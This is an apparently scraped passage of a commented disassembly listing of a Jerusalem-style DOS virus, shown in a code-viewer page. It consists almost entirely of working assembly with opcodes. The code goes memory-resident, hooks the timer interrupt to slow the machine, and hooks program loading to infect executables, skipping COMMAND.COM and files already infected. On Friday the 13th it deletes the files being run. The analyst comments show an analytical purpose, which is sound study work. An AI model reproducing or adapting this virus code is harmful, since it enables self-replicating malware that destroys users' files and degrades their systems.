📄 jerub204.asm
字号:
030B CD 21 INT 021 ; SubProgram (WAIT)
; Stored in AL
030D B4 31 MOV AH,031 ; AX=31[AL]h
030F BA 00 06 MOV DX,0600 ; DX=600h
0312 B1 04 MOV CL,4 ; CL=04h
0314 D3 EA SHR DX,CL ; DX >> 4 (DX=60H)
0316 83 C2 10 ADD DX,010 ; DX=DX+10h (DX=70h)
; Program Size in Paragraphs
; is 70h Bytes
0319 CD 21 INT 021 ; Terminate but Stay Resident
031B 32 C0 XOR AL,AL ; Clear AL
031D CF IRET ; Interrupt Return
; 031Eh is the new INT 08h
; vector. This routine is
; called 18.2 times per
; second
031E 2E 83 3E 1F 00 02 CS CMP W[01F],2 ; Timer decreased til 02h?
0324 75 17 JNE 033D ; No: -> 033D
; Yes: now 32 minutes are
; passed since infection
0326 50 PUSH AX ; Store Registers
0327 53 PUSH BX
0328 51 PUSH CX
0329 52 PUSH DX
032A 55 PUSH BP
032B B8 02 06 MOV AX,0602 ; Scroll box with coordinates
032E B7 87 MOV BH,087 ; (5h,5h),(10h,10h) two
0330 B9 05 05 MOV CX,0505 ; lines upwards
0333 BA 10 10 MOV DX,01010 ;
0336 CD 10 INT 010 ;
0338 5D POP BP ; Restore Registers
0339 5A POP DX
033A 59 POP CX
033B 5B POP BX
033C 58 POP AX
033D 2E FF 0E 1F 00 CS DEC W[01F] ; Decrease Timer-Trigger
; This now becomes 01h
0342 75 12 JNE 0356 ; If 0: -> 0356h
0344 2E C7 06 1F 00 01 00 CS MOV W[01F],1 ; Timer-Trigger set to 01h
034B 50 PUSH AX ; Store AX
034C 51 PUSH CX ; Store CX
034D 56 PUSH SI ; Store SI
034E B9 01 40 MOV CX,04001 ; CX=4001h
0351 F3 AC REP LODSB ; Load byte [SI] into AL and
; advance SI, done CX times.
; This is the routine which
; decreases the speed of the
; machine til 1/5th of the
; original. 32 minutes after
; infection this routine is
; executes 18.2 times a second
0353 5E POP SI ; Restore SI
0354 59 POP CX ; Restore CX
0355 58 POP AX ; Restore AX
0356 2E FF 2E 13 00 CS JMP D[013] ; Jump to original INT 08h
; address
; Here we come if INT 21h is
; called
035B 9C PUSHF ; Store Flags
035C 80 FC E0 CMP AH,0E0 ; AH=0Eh ?
035F 75 05 JNE 0366 ; No: -> 0366h
0361 B8 00 03 MOV AX,0300 ; AX=0300h
0364 9D POPF ; Restore Flags
0365 CF IRET ; Interrupt Return
0366 80 FC DD CMP AH,0DD ; AH=DDh?
0369 74 13 JE 037E ; Yes: -> 037Eh
036B 80 FC DE CMP AH,0DE ; AH=DEh?
036E 74 28 JE 0398 ; Yes: -> 0398h
; INT 21h is never called
; with AH=DEh. So the routine
; at 0398h is never used
; (seems)
0370 3D 00 4B CMP AX,04B00 ; Load & Execute ?
0373 75 03 JNE 0378 ; No: -> 0378h
0375 E9 B4 00 JMP 042C ; Yes: -> 042Ch
0378 9D POPF ; Restore Flags
0379 2E FF 2E 17 00 CS JMP D[017] ; Jmp to original
; INT 21h address
; Execute original program
037E 58 POP AX
037F 58 POP AX ; Restore AX
0380 B8 00 01 MOV AX,0100 ; AX=0100h
0383 2E A3 0A 00 CS MOV W[0A],AX ; Store AX
0387 58 POP AX ; Restore AX
0388 2E A3 0C 00 CS MOV W[0C],AX ; Store AX
038C F3 A4 REP MOVSB ;
038E 9D POPF ; Restore Flags
038F 2E A1 0F 00 CS MOV AX,W[0F] ; AX=0000h
0393 2E FF 2E 0A 00 CS JMP D[0A] ; JUMP -> CS:0100h
; This executes the original
; program
; This routine is called
; when INT 21h with AH=DEh
; is called which never
; happens in the code. I
; have to investigate it
; a bit more. Til then
; it remains without comments.
0398 83 C4 06 ADD SP,6
039B 9D POPF
039C 8C C8 MOV AX,CS
039E 8E D0 MOV SS,AX
03A0 BC 10 07 MOV SP,0710
03A3 06 PUSH ES
03A4 06 PUSH ES
03A5 33 FF XOR DI,DI
03A7 0E PUSH CS
03A8 07 POP ES
03A9 B9 10 00 MOV CX,010
03AC 8B F3 MOV SI,BX
03AE BF 21 00 MOV DI,021
03B1 F3 A4 REP MOVSB
03B3 8C D8 MOV AX,DS
03B5 8E C0 MOV ES,AX
03B7 2E F7 26 7A 00 CS MUL W[07A]
03BC 2E 03 06 2B 00 CS ADD AX,W[02B]
03C1 83 D2 00 ADC DX,0
03C4 2E F7 36 7A 00 CS DIV W[07A]
03C9 8E D8 MOV DS,AX
03CB 8B F2 MOV SI,DX
03CD 8B FA MOV DI,DX
03CF 8C C5 MOV BP,ES
03D1 2E 8B 1E 2F 00 CS MOV BX,W[02F]
03D6 0B DB OR BX,BX
03D8 74 13 JE 03ED
03DA B9 00 80 MOV CX,08000
03DD F3 A5 REP MOVSW
03DF 05 00 10 ADD AX,01000
03E2 81 C5 00 10 ADD BP,01000
03E6 8E D8 MOV DS,AX
03E8 8E C5 MOV ES,BP
03EA 4B DEC BX
03EB 75 ED JNE 03DA
03ED 2E 8B 0E 2D 00 CS MOV CX,W[02D]
03F2 F3 A4 REP MOVSB
03F4 58 POP AX
03F5 50 PUSH AX
03F6 05 10 00 ADD AX,010
03F9 2E 01 06 29 00 CS ADD W[029],AX
03FE 2E 01 06 25 00 CS ADD W[025],AX
0403 2E A1 21 00 CS MOV AX,W[021]
0407 1F POP DS
0408 07 POP ES
0409 2E 8E 16 29 00 CS MOV SS,W[029]
040E 2E 8B 26 27 00 CS MOV SP,W[027]
0413 2E FF 2E 23 00 CS JMP D[023]
; We come here if B[0Eh]=1,
; which means Friday 13th,
; year<>1987. This routine
; deletes the loaded file.
0418 33 C9 XOR CX,CX ; Clear all bits of the File
; Attribute
041A B8 01 43 MOV AX,04301 ;
041D CD 21 INT 021 ; Put File Atributes
041F B4 41 MOV AH,041 ;
0421 CD 21 INT 021 ; Delete a File (Unlink)
0423 B8 00 4B MOV AX,04B00
0426 9D POPF ; Get Flags
0427 2E FF 2E 17 00 CS JMP D[017]
; We come here each time a
; file is loaded with the
; load and execute call
; (INT 21h, AX=4B00h)
042C 2E 80 3E 0E 00 01 CS CMP B[0E],1 ; Is it Friday 13th,
; year<>1987?
0432 74 E4 JE 0418 ; Yes: -> 0418h
0434 2E C7 06 70 00 FF FF CS MOV W[070],-1 ; File Handle -1 ???
043B 2E C7 06 8F 00 00 00 CS MOV W[08F],0 ; Clear Memory-Available
; variable
0442 2E 89 16 80 00 CS MOV W[080],DX ; DS:DX -> ASCIZ Filename,
0447 2E 8C 1E 82 00 CS MOV W[082],DS ; Store DX and DS
044C 50 PUSH AX
044D 53 PUSH BX
044E 51 PUSH CX
044F 52 PUSH DX
0450 56 PUSH SI
0451 57 PUSH DI
0452 1E PUSH DS
0453 06 PUSH ES
0454 FC CLD
0455 8B FA MOV DI,DX ;
0457 32 D2 XOR DL,DL ; DL=00h : Take Default Drive
0459 80 7D 01 3A CMP B[DI+1],03A ; ':' at 2nd place in ASCIZ-
; filename
045D 75 05 JNE 0464 ; No: -> 0464h
045F 8A 15 MOV DL,B[DI] ; Get Drive Letter
0461 80 E2 1F AND DL,01F ; Get Drive Code
; 0 = Default
; 1 = A
; 2 = B, etc.
0464 B4 36 MOV AH,036 ;
0466 CD 21 INT 021 ; Get disk space
; BX=# of available clusters
; CX=Bytes per sector
; DX=Total clusters
0468 3D FF FF CMP AX,-1 ; No Sectors Free?
046B 75 03 JNE 0470 ; No: -> 0470h
046D E9 77 02 JMP 06E7 ; Yes: -> 06E7h
0470 F7 E3 MUL BX ; Calculate Free Space
0472 F7 E1 MUL CX ;
0474 0B D2 OR DX,DX ;
0476 75 05 JNE 047D ;
0478 3D 10 07 CMP AX,0710 ; 1808 Bytes Free?
047B 72 F0 JB 046D ; No: -> 046Dh
047D 2E 8B 16 80 00 CS MOV DX,W[080] ; Restore DX's ASCIZ Filename
0482 1E PUSH DS
0483 07 POP ES
0484 32 C0 XOR AL,AL ; AL=00h
0486 B9 41 00 MOV CX,041 ;
0489 F2 AE REPNE SCASB ; Check if filename
048B 2E 8B 36 80 00 CS MOV SI,W[080] ; is in UPPERCASE
0490 8A 04 MOV AL,B[SI] ;
0492 0A C0 OR AL,AL ; All UPPERRCASE?
0494 74 0E JE 04A4 ; IF so: -> 04A4h
0496 3C 61 CMP AL,061 ; AL<'a' ?
0498 72 07 JB 04A1 ; Yes: -> 04A1h
049A 3C 7A CMP AL,07A ; AL>'z' ?
049C 77 03 JA 04A1 ; Yes: -> 04A1h
049E 80 2C 20 SUB B[SI],020 ; Transfer filename
; into UPPERCASE
04A1 46 INC SI ; SI=SI+1
04A2 EB EC JMP 0490
04A4 B9 0B 00 MOV CX,0B ; CX=0Bh
04A7 2B F1 SUB SI,CX ; Return SI to start
; of Filename
04A9 BF 84 00 MOV DI,084 ; Start of COMMAND.COM
; filename
04AC 0E PUSH CS
04AD 07 POP ES
04AE B9 0B 00 MOV CX,0B
04B1 F3 A6 REPE CMPSB ; Filename=COMMAND.COM ?
04B3 75 03 JNE 04B8 ; No: -> 04B8h
04B5 E9 2F 02 JMP 06E7 ; Yes: -> 06E7h
; We come here if the
; loaded program is not
; COMMAND.COM
04B8 B8 00 43 MOV AX,04300 ;
04BB CD 21 INT 021 ; Get File Attributes
04BD 72 05 JB 04C4 ; If Error: -> 04C4h
04BF 2E 89 0E 72 00 CS MOV W[072],CX ; Store File Attributes
04C4 72 25 JB 04EB ; If Error: -> 04EBh
04C6 32 C0 XOR AL,AL ; AL=00h
04C8 2E A2 4E 00 CS MOV B[04E],AL ; Dummy=0
04CC 1E PUSH DS ;
04CD 07 POP ES ;
04CE 8B FA MOV DI,DX ;
04D0 B9 41 00 MOV CX,041 ;
04D3 F2 AE REPNE SCASB ;
04D5 80 7D FE 4D CMP B[DI-2],04D ; "M" ?
04D9 74 0B JE 04E6 ; Yes: -> 04E6h
04DB 80 7D FE 6D CMP B[DI-2],06D ; "m" ?
04DF 74 05 JE 04E6 ; Yes: -> 04E6h
04E1 2E FE 06 4E 00 CS INC B[04E] ; Dummy=Dummy+1
04E6 B8 00 3D MOV AX,03D00 ; Open Disk File with
04E9 CD 21 INT 021 ; handle in compatibility
; mode
; DS:DX : -> ASCIZ Filename
04EB 72 5A JB 0547 ; IF Error: -> 0547h
04ED 2E A3 70 00 CS MOV W[070],AX ; Store File Handle
04F1 8B D8 MOV BX,AX ; BX=File Handle
04F3 B8 02 42 MOV AX,04202 ; Move File Read/Write
; Pointer (LSEEK) with
; offset from end of file
04F6 B9 FF FF MOV CX,-1 ; CX:DX = offset in bytes
04F9 BA FB FF MOV DX,-5 ;
04FC CD 21 INT 021 ;
; DX:AX = new absolute
; offset from beginning of
; file
04FE 72 EB JB 04EB ; If Error: -> 04EBh
0500 05 05 00 ADD AX,5 ; ????
0503 2E A3 11 00 CS MOV W[011],AX ; Store Length of File
0507 B9 05 00 MOV CX,5 ; Read from a file with
050A BA 6B 00 MOV DX,06B ; handle BX 5h bytes into
050D 8C C8 MOV AX,CS ; DS:DX buffer
050F 8E D8 MOV DS,AX ;
0511 8E C0 MOV ES,AX ;
0513 B4 3F MOV AH,03F ;
0515 CD 21 INT 021 ;
0517 8B FA MOV DI,DX ; DI=DX=6Bh
0519 BE 05 00 MOV SI,5 ; SI=05h
051C F3 A6 REPE CMPSB ; Check first 5 bytes to see
; if a file already is
; infected
051E 75 07 JNE 0527 ; If not: -> 0527h
0520 B4 3E MOV AH,03E ; Close a file with
0522 CD 21 INT 021 ; handle
0524 E9 C0 01 JMP 06E7 ; Jump -> 06E7h
0527 B8 24 35 MOV AX,03524 ; Get original int 24h
052A CD 21 INT 021 ; vector. Stored in ES:BX
052C 89 1E 1B 00 MOV W[01B],BX ; Store BX of INT 24h vector
0530 8C 06 1D 00 MOV W[01D],ES ; Store ES of INT 24h vector
0534 BA 1B 02 MOV DX,021B ; Set new int 24h vector
0537 B8 24 25 MOV AX,02524 ; to DS:DX
053A CD 21 INT 021 ;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -